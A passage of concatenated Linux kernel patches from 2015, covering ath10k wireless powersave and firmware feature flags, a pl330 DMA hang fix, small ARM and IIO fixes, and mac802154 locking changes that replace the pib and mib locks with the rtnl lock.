ee2173d61257..d7696ddc03c4 100644 --- a/drivers/net/wireless/ath/ath10k/pci.h +++ b/drivers/net/wireless/ath/ath10k/pci.h @@ -191,6 +191,35 @@ struct ath10k_pci { * device bootup is executed and re-programmed later. */ u16 link_ctl; + + /* Protects ps_awake and ps_wake_refcount */ + spinlock_t ps_lock; + + /* The device has a special powersave-oriented register. When device is + * considered asleep it drains less power and driver is forbidden from + * accessing most MMIO registers. If host were to access them without + * waking up the device might scribble over host memory or return + * 0xdeadbeef readouts. + */ + unsigned long ps_wake_refcount; + + /* Waking up takes some time (up to 2ms in some cases) so it can be bad + * for latency. To mitigate this the device isn't immediately allowed + * to sleep after all references are undone - instead there's a grace + * period after which the powersave register is updated unless some + * activity to/from device happened in the meantime. + * + * Also see comments on ATH10K_PCI_SLEEP_GRACE_PERIOD_MSEC. + */ + struct timer_list ps_timer; + + /* MMIO registers are used to communicate with the device. With + * intensive traffic accessing powersave register would be a bit + * wasteful overhead and would needlessly stall CPU. It is far more + * efficient to rely on a variable in RAM and update it only upon + * powersave register state changes. + */ + bool ps_awake; }; static inline struct ath10k_pci *ath10k_pci_priv(struct ath10k *ar) @@ -215,61 +244,25 @@ static inline struct ath10k_pci *ath10k_pci_priv(struct ath10k *ar) * for this device; but that's not guaranteed. */ #define TARG_CPU_SPACE_TO_CE_SPACE(ar, pci_addr, addr) \ - (((ioread32((pci_addr)+(SOC_CORE_BASE_ADDRESS| \ + (((ath10k_pci_read32(ar, (SOC_CORE_BASE_ADDRESS | \ CORE_CTRL_ADDRESS)) & 0x7ff) << 21) | \ 0x100000 | ((addr) & 0xfffff)) /* Wait up to this many Ms for a Diagnostic Access CE operation to complete */ #define DIAG_ACCESS_CE_TIMEOUT_MS 10 -/* Target exposes its registers for direct access. However before host can - * access them it needs to make sure the target is awake (ath10k_pci_wake, - * ath10k_pci_wake_wait, ath10k_pci_is_awake). Once target is awake it won't go - * to sleep unless host tells it to (ath10k_pci_sleep). - * - * If host tries to access target registers without waking it up it can - * scribble over host memory. - * - * If target is asleep waking it up may take up to even 2ms. - */ - -static inline void ath10k_pci_write32(struct ath10k *ar, u32 offset, - u32 value) -{ - struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); - - iowrite32(value, ar_pci->mem + offset); -} - -static inline u32 ath10k_pci_read32(struct ath10k *ar, u32 offset) -{ - struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); - - return ioread32(ar_pci->mem + offset); -} - -static inline u32 ath10k_pci_soc_read32(struct ath10k *ar, u32 addr) -{ - return ath10k_pci_read32(ar, RTC_SOC_BASE_ADDRESS + addr); -} +void ath10k_pci_write32(struct ath10k *ar, u32 offset, u32 value); +void ath10k_pci_soc_write32(struct ath10k *ar, u32 addr, u32 val); +void ath10k_pci_reg_write32(struct ath10k *ar, u32 addr, u32 val); -static inline void ath10k_pci_soc_write32(struct ath10k *ar, u32 addr, u32 val) -{ - ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + addr, val); -} +u32 ath10k_pci_read32(struct ath10k *ar, u32 offset); +u32 ath10k_pci_soc_read32(struct ath10k *ar, u32 addr); +u32 ath10k_pci_reg_read32(struct ath10k *ar, u32 addr); -static inline u32 ath10k_pci_reg_read32(struct ath10k *ar, u32 addr) -{ - struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); - - return ioread32(ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + addr); -} - -static inline void ath10k_pci_reg_write32(struct ath10k *ar, u32 addr, u32 val) -{ - struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); - - iowrite32(val, ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + addr); -} +/* QCA6174 is known to have Tx/Rx issues when SOC_WAKE register is poked too + * frequently. To avoid this put SoC to sleep after a very conservative grace + * period. Adjust with great care. + */ +#define ATH10K_PCI_SLEEP_GRACE_PERIOD_MSEC 60 #endif /* _PCI_H_ */ From 48f4ca34f36bb947d8a7cd4ff8c8e282f14d51e6 Mon Sep 17 00:00:00 2001 From: Michal Kazior Date: Tue, 19 May 2015 14:09:34 +0200 Subject: [PATCH 161/872] ath10k: add new 4addr related fw_feature Some firmware revisions pad 4th hw address in Native Wifi Rx decap. This is the case with 10.x and it was assumed that this is true for all firmware images. However QCA988X with 999.999.0.636 and QCA61X4 with WLAN.RM.2.0-00088 don't have the padding. Hence add a feature flag indicating that the padding isn't present so firmware images can advertise it appropriately. This way driver will behave as it was before with old firmware blobs and doesn't cause any regressions from user perspective. Effectively this patch enables QCA988X with 999.999.0.636 and QCA61X4 with WLAN.RM.2.0-00088 to set up client bridging provided user has an updated firmware blob. Signed-off-by: Michal Kazior Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/core.h | 5 +++++ drivers/net/wireless/ath/ath10k/htt_rx.c | 14 ++++++++++---- 2 files changed, 15 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/ath/ath10k/core.h b/drivers/net/wireless/ath/ath10k/core.h index 827b3d79ed0c..70fcdc9c2758 100644 --- a/drivers/net/wireless/ath/ath10k/core.h +++ b/drivers/net/wireless/ath/ath10k/core.h @@ -463,6 +463,11 @@ enum ath10k_fw_features { /* Don't trust error code from otp.bin */ ATH10K_FW_FEATURE_IGNORE_OTP_RESULT, + /* Some firmware revisions pad 4th hw address to 4 byte boundary making + * it 8 bytes long in Native Wifi Rx decap. + */ + ATH10K_FW_FEATURE_NO_NWIFI_DECAP_4ADDR_PADDING, + /* keep last */ ATH10K_FW_FEATURE_COUNT, }; diff --git a/drivers/net/wireless/ath/ath10k/htt_rx.c b/drivers/net/wireless/ath/ath10k/htt_rx.c index b26e32f42656..89eb16b30fc4 100644 --- a/drivers/net/wireless/ath/ath10k/htt_rx.c +++ b/drivers/net/wireless/ath/ath10k/htt_rx.c @@ -965,10 +965,16 @@ static void ath10k_process_rx(struct ath10k *ar, ieee80211_rx(ar->hw, skb); } -static int ath10k_htt_rx_nwifi_hdrlen(struct ieee80211_hdr *hdr) +static int ath10k_htt_rx_nwifi_hdrlen(struct ath10k *ar, + struct ieee80211_hdr *hdr) { - /* nwifi header is padded to 4 bytes. this fixes 4addr rx */ - return round_up(ieee80211_hdrlen(hdr->frame_control), 4); + int len = ieee80211_hdrlen(hdr->frame_control); + + if (!test_bit(ATH10K_FW_FEATURE_NO_NWIFI_DECAP_4ADDR_PADDING, + ar->fw_features)) + len = round_up(len, 4); + + return len; } static void ath10k_htt_rx_h_undecap_raw(struct ath10k *ar, @@ -1067,7 +1073,7 @@ static void ath10k_htt_rx_h_undecap_nwifi(struct ath10k *ar, /* pull decapped header and copy SA & DA */ hdr = (struct ieee80211_hdr *)msdu->data; - hdr_len = ath10k_htt_rx_nwifi_hdrlen(hdr); + hdr_len = ath10k_htt_rx_nwifi_hdrlen(ar, hdr); ether_addr_copy(da, ieee80211_get_DA(hdr)); ether_addr_copy(sa, ieee80211_get_SA(hdr)); skb_pull(msdu, hdr_len); From 81cc6edc08705ac0146fe6ac14a0982a31ce6f3d Mon Sep 17 00:00:00 2001 From: Krzysztof Kozlowski Date: Thu, 21 May 2015 09:34:09 +0900 Subject: [PATCH 162/872] dmaengine: pl330: Fix hang on dmaengine_terminate_all on certain boards The pl330 device could hang infinitely on certain boards when DMA channels are terminated. It was caused by lack of runtime resume when executing pl330_terminate_all() which calls the _stop() function. _stop() accesses device register and can loop infinitely while checking for device state. The hang was confirmed by Dinh Nguyen on Altera SOCFPGA Cyclone V board during boot. It can be also triggered with: $ echo 1 > /sys/module/dmatest/parameters/iterations $ echo dma1chan0 > /sys/module/dmatest/parameters/channel $ echo 1 > /sys/module/dmatest/parameters/run $ sleep 1 $ cat /sys/module/dmatest/parameters/run Reported-by: Dinh Nguyen Signed-off-by: Krzysztof Kozlowski Fixes: ae43b3289186 ("ARM: 8202/1: dmaengine: pl330: Add runtime Power Management support v12") Cc: Tested-by: Dinh Nguyen Signed-off-by: Vinod Koul --- drivers/dma/pl330.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/dma/pl330.c b/drivers/dma/pl330.c index a7d9d3029b14..340f9e607cd8 100644 --- a/drivers/dma/pl330.c +++ b/drivers/dma/pl330.c @@ -2127,6 +2127,7 @@ static int pl330_terminate_all(struct dma_chan *chan) struct pl330_dmac *pl330 = pch->dmac; LIST_HEAD(list); + pm_runtime_get_sync(pl330->ddma.dev); spin_lock_irqsave(&pch->lock, flags); spin_lock(&pl330->lock); _stop(pch->thread); @@ -2151,6 +2152,8 @@ static int pl330_terminate_all(struct dma_chan *chan) list_splice_tail_init(&pch->work_list, &pl330->desc_pool); list_splice_tail_init(&pch->completed_list, &pl330->desc_pool); spin_unlock_irqrestore(&pch->lock, flags); + pm_runtime_mark_last_busy(pl330->ddma.dev); + pm_runtime_put_autosuspend(pl330->ddma.dev); return 0; } From bd7413aef860baed78c76734050c1de4194ed61c Mon Sep 17 00:00:00 2001 From: Robert Jarzmik Date: Thu, 21 May 2015 21:55:42 +0200 Subject: [PATCH 163/872] ARM: pxa: pxa_cplds: signedness bug in probe "base_irq" needs to be signed for the error handling to work. Also we can remove the initialization because we re-assign it later. Fixes: aa8d6b73ea33 ('ARM: pxa: pxa_cplds: add lubbock and mainstone IO') Signed-off-by: Dan Carpenter Signed-off-by: Robert Jarzmik Signed-off-by: Arnd Bergmann --- arch/arm/mach-pxa/pxa_cplds_irqs.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/mach-pxa/pxa_cplds_irqs.c b/arch/arm/mach-pxa/pxa_cplds_irqs.c index f1aeb54fabe3..2385052b0ce1 100644 --- a/arch/arm/mach-pxa/pxa_cplds_irqs.c +++ b/arch/arm/mach-pxa/pxa_cplds_irqs.c @@ -107,7 +107,7 @@ static int cplds_probe(struct platform_device *pdev) struct resource *res; struct cplds *fpga; int ret; - unsigned int base_irq = 0; + int base_irq; unsigned long irqflags = 0; fpga = devm_kzalloc(&pdev->dev, sizeof(*fpga), GFP_KERNEL); From 242ddf04297f2c4768bd8eb7593ab911910c5f76 Mon Sep 17 00:00:00 2001 From: Inki Dae Date: Sat, 23 May 2015 11:46:55 +0900 Subject: [PATCH 164/872] ARM: dts: set display clock correctly for exynos4412-trats2 This patch sets display clock correctly. If Display clock isn't set correctly then you would find below messages and Display controller doesn't work correctly. exynos-drm: No connectors reported connected with modes [drm] Cannot find any crtc or sizes - going 1024x768 Fixes: abc0b1447d49 ("drm: Perform basic sanity checks on probed modes") Cc: Signed-off-by: Inki Dae Reviewed-by: Krzysztof Kozlowski Tested-by: Krzysztof Kozlowski Signed-off-by: Kukjin Kim --- arch/arm/boot/dts/exynos4412-trats2.dts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/boot/dts/exynos4412-trats2.dts b/arch/arm/boot/dts/exynos4412-trats2.dts index 173ffa479ad3..792394dd0f2a 100644 --- a/arch/arm/boot/dts/exynos4412-trats2.dts +++ b/arch/arm/boot/dts/exynos4412-trats2.dts @@ -736,7 +736,7 @@ display-timings { timing-0 { - clock-frequency = <0>; + clock-frequency = <57153600>; hactive = <720>; vactive = <1280>; hfront-porch = <5>; From e5d732186270e0881f47d95610316c0614b21c3e Mon Sep 17 00:00:00 2001 From: Axel Lin Date: Wed, 20 May 2015 08:53:20 +0800 Subject: [PATCH 165/872] iio: adc: twl6030-gpadc: Fix modalias Remove extra space between platform prefix and DRIVER_NAME in MODULE_ALIAS. Signed-off-by: Axel Lin Cc: Signed-off-by: Jonathan Cameron --- drivers/iio/adc/twl6030-gpadc.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/iio/adc/twl6030-gpadc.c b/drivers/iio/adc/twl6030-gpadc.c index 89d8aa1d2818..df12c57e6ce0 100644 --- a/drivers/iio/adc/twl6030-gpadc.c +++ b/drivers/iio/adc/twl6030-gpadc.c @@ -1001,7 +1001,7 @@ static struct platform_driver twl6030_gpadc_driver = { module_platform_driver(twl6030_gpadc_driver); -MODULE_ALIAS("platform: " DRIVER_NAME); +MODULE_ALIAS("platform:" DRIVER_NAME); MODULE_AUTHOR("Balaji T K "); MODULE_AUTHOR("Graeme Gregory "); MODULE_AUTHOR("Oleksandr Kozaruk Date: Fri, 22 May 2015 17:43:51 +0200 Subject: [PATCH 166/872] mac802154: fix hold rtnl while ioctl This patch fixes an issue to set address configuration with ioctl. Accessing the mib requires rtnl lock and the ndo_do_ioctl doesn't hold the rtnl lock while this callback is called. This patch do that manually. Signed-off-by: Alexander Aring Reported-by: Matteo Petracca Reviewed-by: Stefan Schmidt Signed-off-by: Marcel Holtmann --- net/mac802154/iface.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/net/mac802154/iface.c b/net/mac802154/iface.c index 91b75abbd1a1..2a5878889289 100644 --- a/net/mac802154/iface.c +++ b/net/mac802154/iface.c @@ -62,8 +62,7 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) (struct sockaddr_ieee802154 *)&ifr->ifr_addr; int err = -ENOIOCTLCMD; - ASSERT_RTNL(); - + rtnl_lock(); spin_lock_bh(&sdata->mib_lock); switch (cmd) { @@ -90,6 +89,7 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) case SIOCSIFADDR: if (netif_running(dev)) { spin_unlock_bh(&sdata->mib_lock); + rtnl_unlock(); return -EBUSY; } @@ -112,6 +112,7 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) } spin_unlock_bh(&sdata->mib_lock); + rtnl_unlock(); return err; } From 4a3a8c0c3a613e481bea931f0d65dc4a7efaa9b9 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Fri, 22 May 2015 17:43:52 +0200 Subject: [PATCH 167/872] mac802154: remove pib lock This patch removes the pib lock which is now replaced by rtnl lock. The new interface already use the rtnl lock only. Nevertheless this patch will fix issues while using new and old interface at the same time. Signed-off-by: Alexander Aring Reviewed-by: Stefan Schmidt Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 2 -- net/ieee802154/core.c | 2 -- net/ieee802154/nl-phy.c | 6 +++--- net/mac802154/iface.c | 7 ------- net/mac802154/mib.c | 4 ++-- 5 files changed, 5 insertions(+), 16 deletions(-) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 11bbf17ad865..c6aa1d210182 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -121,8 +121,6 @@ enum wpan_phy_flags { }; struct wpan_phy { - struct mutex pib_lock; - /* If multiple wpan_phys are registered and you're handed e.g. * a regular netdev with assigned ieee802154_ptr, you won't * know whether it points to a wpan_phy your driver has registered diff --git a/net/ieee802154/core.c b/net/ieee802154/core.c index 2ee00e8a0308..b0248e934230 100644 --- a/net/ieee802154/core.c +++ b/net/ieee802154/core.c @@ -121,8 +121,6 @@ wpan_phy_new(const struct cfg802154_ops *ops, size_t priv_size) /* atomic_inc_return makes it start at 1, make it start at 0 */ rdev->wpan_phy_idx--; - mutex_init(&rdev->wpan_phy.pib_lock); - INIT_LIST_HEAD(&rdev->wpan_dev_list); device_initialize(&rdev->wpan_phy.dev); dev_set_name(&rdev->wpan_phy.dev, PHY_NAME "%d", rdev->wpan_phy_idx); diff --git a/net/ieee802154/nl-phy.c b/net/ieee802154/nl-phy.c index cbc0d09351e0..77d73014bde3 100644 --- a/net/ieee802154/nl-phy.c +++ b/net/ieee802154/nl-phy.c @@ -50,7 +50,7 @@ static int ieee802154_nl_fill_phy(struct sk_buff *msg, u32 portid, if (!hdr) goto out; - mutex_lock(&phy->pib_lock); + rtnl_lock(); if (nla_put_string(msg, IEEE802154_ATTR_PHY_NAME, wpan_phy_name(phy)) || nla_put_u8(msg, IEEE802154_ATTR_PAGE, phy->current_page) || nla_put_u8(msg, IEEE802154_ATTR_CHANNEL, phy->current_channel)) @@ -63,13 +63,13 @@ static int ieee802154_nl_fill_phy(struct sk_buff *msg, u32 portid, nla_put(msg, IEEE802154_ATTR_CHANNEL_PAGE_LIST, pages * sizeof(uint32_t), buf)) goto nla_put_failure; - mutex_unlock(&phy->pib_lock); + rtnl_unlock(); kfree(buf); genlmsg_end(msg, hdr); return 0; nla_put_failure: - mutex_unlock(&phy->pib_lock); + rtnl_unlock(); genlmsg_cancel(msg, hdr); out: kfree(buf); diff --git a/net/mac802154/iface.c b/net/mac802154/iface.c index 2a5878889289..22f478be7489 100644 --- a/net/mac802154/iface.c +++ b/net/mac802154/iface.c @@ -242,7 +242,6 @@ static int mac802154_wpan_open(struct net_device *dev) struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); struct ieee802154_local *local = sdata->local; struct wpan_dev *wpan_dev = &sdata->wpan_dev; - struct wpan_phy *phy = sdata->local->phy; rc = ieee802154_check_concurrent_iface(sdata, sdata->vif.type); if (rc < 0) @@ -252,8 +251,6 @@ static int mac802154_wpan_open(struct net_device *dev) if (rc < 0) return rc; - mutex_lock(&phy->pib_lock); - if (local->hw.flags & IEEE802154_HW_PROMISCUOUS) { rc = drv_set_promiscuous_mode(local, wpan_dev->promiscuous_mode); @@ -295,11 +292,7 @@ static int mac802154_wpan_open(struct net_device *dev) goto out; } - mutex_unlock(&phy->pib_lock); - return 0; - out: - mutex_unlock(&phy->pib_lock); return rc; } diff --git a/net/mac802154/mib.c b/net/mac802154/mib.c index 5cf019a57fd7..033dfc7755c6 100644 --- a/net/mac802154/mib.c +++ b/net/mac802154/mib.c @@ -91,16 +91,16 @@ void mac802154_dev_set_page_channel(struct net_device *dev, u8 page, u8 chan) struct ieee802154_local *local = sdata->local; int res; + ASSERT_RTNL(); + BUG_ON(dev->type != ARPHRD_IEEE802154); res = drv_set_channel(local, page, chan); if (res) { pr_debug("set_channel failed\n"); } else { - mutex_lock(&local->phy->pib_lock); local->phy->current_channel = chan; local->phy->current_page = page; - mutex_unlock(&local->phy->pib_lock); } } From 344f8c119df742f2bf7098cf8fc326351f583249 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Fri, 22 May 2015 17:43:53 +0200 Subject: [PATCH 168/872] mac802154: use atomic ops for sequence incrementation This patch will use atomic operations for sequence number incrementation while MAC header generation. Upper layers like af_802154 or 6LoWPAN could call this function in a parallel context while generating 802.15.4 MAC header before queuing into wpan interfaces transmit queue. Signed-off-by: Alexander Aring Reviewed-by: Stefan Schmidt Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 4 ++-- include/net/ieee802154_netdev.h | 1 - net/ieee802154/6lowpan/core.c | 8 -------- net/mac802154/ieee802154_i.h | 1 - net/mac802154/iface.c | 9 ++++++--- net/mac802154/mac_cmd.c | 1 - net/mac802154/mib.c | 9 --------- 7 files changed, 8 insertions(+), 25 deletions(-) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index c6aa1d210182..4de59aa96173 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -177,9 +177,9 @@ struct wpan_dev { __le64 extended_addr; /* MAC BSN field */ - u8 bsn; + atomic_t bsn; /* MAC DSN field */ - u8 dsn; + atomic_t dsn; u8 min_be; u8 max_be; diff --git a/include/net/ieee802154_netdev.h b/include/net/ieee802154_netdev.h index 94a297052442..144fefb4d619 100644 --- a/include/net/ieee802154_netdev.h +++ b/include/net/ieee802154_netdev.h @@ -431,7 +431,6 @@ struct ieee802154_mlme_ops { */ __le16 (*get_pan_id)(const struct net_device *dev); __le16 (*get_short_addr)(const struct net_device *dev); - u8 (*get_dsn)(const struct net_device *dev); }; static inline struct ieee802154_mlme_ops * diff --git a/net/ieee802154/6lowpan/core.c b/net/ieee802154/6lowpan/core.c index 0ae5822ef944..2e77fada7e54 100644 --- a/net/ieee802154/6lowpan/core.c +++ b/net/ieee802154/6lowpan/core.c @@ -69,13 +69,6 @@ static __le16 lowpan_get_short_addr(const struct net_device *dev) return ieee802154_mlme_ops(real_dev)->get_short_addr(real_dev); } -static u8 lowpan_get_dsn(const struct net_device *dev) -{ - struct net_device *real_dev = lowpan_dev_info(dev)->real_dev; - - return ieee802154_mlme_ops(real_dev)->get_dsn(real_dev); -} - static struct header_ops lowpan_header_ops = { .create = lowpan_header_create, }; @@ -106,7 +99,6 @@ static const struct net_device_ops lowpan_netdev_ops = { static struct ieee802154_mlme_ops lowpan_mlme = { .get_pan_id = lowpan_get_pan_id, .get_short_addr = lowpan_get_short_addr, - .get_dsn = lowpan_get_dsn, }; static void lowpan_setup(struct net_device *dev) diff --git a/net/mac802154/ieee802154_i.h b/net/mac802154/ieee802154_i.h index 127ba18386fc..56b3847466e9 100644 --- a/net/mac802154/ieee802154_i.h +++ b/net/mac802154/ieee802154_i.h @@ -141,7 +141,6 @@ __le16 mac802154_dev_get_short_addr(const struct net_device *dev); __le16 mac802154_dev_get_pan_id(const struct net_device *dev); void mac802154_dev_set_pan_id(struct net_device *dev, __le16 val); void mac802154_dev_set_page_channel(struct net_device *dev, u8 page, u8 chan); -u8 mac802154_dev_get_dsn(const struct net_device *dev); int mac802154_get_params(struct net_device *dev, struct ieee802154_llsec_params *params); diff --git a/net/mac802154/iface.c b/net/mac802154/iface.c index 22f478be7489..0ec7bc402e29 100644 --- a/net/mac802154/iface.c +++ b/net/mac802154/iface.c @@ -368,7 +368,7 @@ static int mac802154_header_create(struct sk_buff *skb, hdr.fc.type = cb->type; hdr.fc.security_enabled = cb->secen; hdr.fc.ack_request = cb->ackreq; - hdr.seq = ieee802154_mlme_ops(dev)->get_dsn(dev); + hdr.seq = atomic_inc_return(&dev->ieee802154_ptr->dsn) & 0xFF; if (mac802154_set_header_security(sdata, &hdr, cb) < 0) return -EINVAL; @@ -468,13 +468,16 @@ ieee802154_setup_sdata(struct ieee802154_sub_if_data *sdata, enum nl802154_iftype type) { struct wpan_dev *wpan_dev = &sdata->wpan_dev; + u8 tmp; /* set some type-dependent values */ sdata->vif.type = type; sdata->wpan_dev.iftype = type; - get_random_bytes(&wpan_dev->bsn, 1); - get_random_bytes(&wpan_dev->dsn, 1); + get_random_bytes(&tmp, sizeof(tmp)); + atomic_set(&wpan_dev->bsn, tmp); + get_random_bytes(&tmp, sizeof(tmp)); + atomic_set(&wpan_dev->dsn, tmp); /* defaults per 802.15.4-2011 */ wpan_dev->min_be = 3; diff --git a/net/mac802154/mac_cmd.c b/net/mac802154/mac_cmd.c index 6dcbb3b5994c..3b347d4d3d4c 100644 --- a/net/mac802154/mac_cmd.c +++ b/net/mac802154/mac_cmd.c @@ -153,7 +153,6 @@ struct ieee802154_mlme_ops mac802154_mlme_wpan = { .start_req = mac802154_mlme_start_req, .get_pan_id = mac802154_dev_get_pan_id, .get_short_addr = mac802154_dev_get_short_addr, - .get_dsn = mac802154_dev_get_dsn, .llsec = &mac802154_llsec_ops, diff --git a/net/mac802154/mib.c b/net/mac802154/mib.c index 033dfc7755c6..00a62de9cc23 100644 --- a/net/mac802154/mib.c +++ b/net/mac802154/mib.c @@ -76,15 +76,6 @@ void mac802154_dev_set_pan_id(struct net_device *dev, __le16 val) spin_unlock_bh(&sdata->mib_lock); } -u8 mac802154_dev_get_dsn(const struct net_device *dev) -{ - struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); - - BUG_ON(dev->type != ARPHRD_IEEE802154); - - return sdata->wpan_dev.dsn++; -} - void mac802154_dev_set_page_channel(struct net_device *dev, u8 page, u8 chan) { struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); From c947f7e1e31a708f5a4ea8c1a627bec578cd9223 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Fri, 22 May 2015 17:43:54 +0200 Subject: [PATCH 169/872] mac802154: remove mib lock This patch removes the mib lock. The new locking mechanism is to protect the mib values with the rtnl lock. Note that this isn't always necessary if we have an interface up the most mib values are readonly (e.g. address settings). With this behaviour we can remove locking in hotpath like frame parsing completely. It depends on context if we need to hold the rtnl lock or not, this makes the callbacks of ieee802154_mlme_ops unnecessary because these callbacks hols always the locks. Signed-off-by: Alexander Aring Reviewed-by: Stefan Schmidt Signed-off-by: Marcel Holtmann --- include/net/ieee802154_netdev.h | 9 ------ net/ieee802154/6lowpan/core.c | 20 ------------- net/ieee802154/6lowpan/tx.c | 2 +- net/ieee802154/nl-mac.c | 14 ++++++--- net/ieee802154/socket.c | 12 ++++---- net/mac802154/ieee802154_i.h | 6 ---- net/mac802154/iface.c | 8 ------ net/mac802154/mac_cmd.c | 6 ++-- net/mac802154/mib.c | 50 --------------------------------- net/mac802154/rx.c | 5 ---- 10 files changed, 18 insertions(+), 114 deletions(-) diff --git a/include/net/ieee802154_netdev.h b/include/net/ieee802154_netdev.h index 144fefb4d619..84a72a1382a8 100644 --- a/include/net/ieee802154_netdev.h +++ b/include/net/ieee802154_netdev.h @@ -422,15 +422,6 @@ struct ieee802154_mlme_ops { struct ieee802154_mac_params *params); struct ieee802154_llsec_ops *llsec; - - /* The fields below are required. */ - - /* - * FIXME: these should become the part of PIB/MIB interface. - * However we still don't have IB interface of any kind - */ - __le16 (*get_pan_id)(const struct net_device *dev); - __le16 (*get_short_addr)(const struct net_device *dev); }; static inline struct ieee802154_mlme_ops * diff --git a/net/ieee802154/6lowpan/core.c b/net/ieee802154/6lowpan/core.c index 2e77fada7e54..f20a387a1011 100644 --- a/net/ieee802154/6lowpan/core.c +++ b/net/ieee802154/6lowpan/core.c @@ -55,20 +55,6 @@ LIST_HEAD(lowpan_devices); static int lowpan_open_count; -static __le16 lowpan_get_pan_id(const struct net_device *dev) -{ - struct net_device *real_dev = lowpan_dev_info(dev)->real_dev; - - return ieee802154_mlme_ops(real_dev)->get_pan_id(real_dev); -} - -static __le16 lowpan_get_short_addr(const struct net_device *dev) -{ - struct net_device *real_dev = lowpan_dev_info(dev)->real_dev; - - return ieee802154_mlme_ops(real_dev)->get_short_addr(real_dev); -} - static struct header_ops lowpan_header_ops = { .create = lowpan_header_create, }; @@ -96,11 +82,6 @@ static const struct net_device_ops lowpan_netdev_ops = { .ndo_start_xmit = lowpan_xmit, }; -static struct ieee802154_mlme_ops lowpan_mlme = { - .get_pan_id = lowpan_get_pan_id, - .get_short_addr = lowpan_get_short_addr, -}; - static void lowpan_setup(struct net_device *dev) { dev->addr_len = IEEE802154_ADDR_LEN; @@ -116,7 +97,6 @@ static void lowpan_setup(struct net_device *dev) dev->netdev_ops = &lowpan_netdev_ops; dev->header_ops = &lowpan_header_ops; - dev->ml_priv = &lowpan_mlme; dev->destructor = free_netdev; dev->features |= NETIF_F_NETNS_LOCAL; } diff --git a/net/ieee802154/6lowpan/tx.c b/net/ieee802154/6lowpan/tx.c index 2349070bd534..98acf7319754 100644 --- a/net/ieee802154/6lowpan/tx.c +++ b/net/ieee802154/6lowpan/tx.c @@ -207,7 +207,7 @@ static int lowpan_header(struct sk_buff *skb, struct net_device *dev) /* prepare wpan address data */ sa.mode = IEEE802154_ADDR_LONG; - sa.pan_id = ieee802154_mlme_ops(dev)->get_pan_id(dev); + sa.pan_id = lowpan_dev_info(dev)->real_dev->ieee802154_ptr->pan_id; sa.extended_addr = ieee802154_devaddr_from_raw(saddr); /* intra-PAN communications */ diff --git a/net/ieee802154/nl-mac.c b/net/ieee802154/nl-mac.c index cdc1cc3543f6..ada58a81b753 100644 --- a/net/ieee802154/nl-mac.c +++ b/net/ieee802154/nl-mac.c @@ -97,8 +97,10 @@ static int ieee802154_nl_fill_iface(struct sk_buff *msg, u32 portid, BUG_ON(!phy); get_device(&phy->dev); - short_addr = ops->get_short_addr(dev); - pan_id = ops->get_pan_id(dev); + rtnl_lock(); + short_addr = dev->ieee802154_ptr->short_addr; + pan_id = dev->ieee802154_ptr->pan_id; + rtnl_unlock(); if (nla_put_string(msg, IEEE802154_ATTR_DEV_NAME, dev->name) || nla_put_string(msg, IEEE802154_ATTR_PHY_NAME, wpan_phy_name(phy)) || @@ -244,7 +246,9 @@ int ieee802154_associate_resp(struct sk_buff *skb, struct genl_info *info) addr.mode = IEEE802154_ADDR_LONG; addr.extended_addr = nla_get_hwaddr( info->attrs[IEEE802154_ATTR_DEST_HW_ADDR]); - addr.pan_id = ieee802154_mlme_ops(dev)->get_pan_id(dev); + rtnl_lock(); + addr.pan_id = dev->ieee802154_ptr->pan_id; + rtnl_unlock(); ret = ieee802154_mlme_ops(dev)->assoc_resp(dev, &addr, nla_get_shortaddr(info->attrs[IEEE802154_ATTR_DEST_SHORT_ADDR]), @@ -281,7 +285,9 @@ int ieee802154_disassociate_req(struct sk_buff *skb, struct genl_info *info) addr.short_addr = nla_get_shortaddr( info->attrs[IEEE802154_ATTR_DEST_SHORT_ADDR]); } - addr.pan_id = ieee802154_mlme_ops(dev)->get_pan_id(dev); + rtnl_lock(); + addr.pan_id = dev->ieee802154_ptr->pan_id; + rtnl_unlock(); ret = ieee802154_mlme_ops(dev)->disassoc_req(dev, &addr, nla_get_u8(info->attrs[IEEE802154_ATTR_REASON])); diff --git a/net/ieee802154/socket.c b/net/ieee802154/socket.c index 7aaaf967df58..e5cc2537c2a3 100644 --- a/net/ieee802154/socket.c +++ b/net/ieee802154/socket.c @@ -64,10 +64,8 @@ ieee802154_get_dev(struct net *net, const struct ieee802154_addr *addr) if (tmp->type != ARPHRD_IEEE802154) continue; - pan_id = ieee802154_mlme_ops(tmp)->get_pan_id(tmp); - short_addr = - ieee802154_mlme_ops(tmp)->get_short_addr(tmp); - + pan_id = tmp->ieee802154_ptr->pan_id; + short_addr = tmp->ieee802154_ptr->short_addr; if (pan_id == addr->pan_id && short_addr == addr->short_addr) { dev = tmp; @@ -797,9 +795,9 @@ static int ieee802154_dgram_deliver(struct net_device *dev, struct sk_buff *skb) /* Data frame processing */ BUG_ON(dev->type != 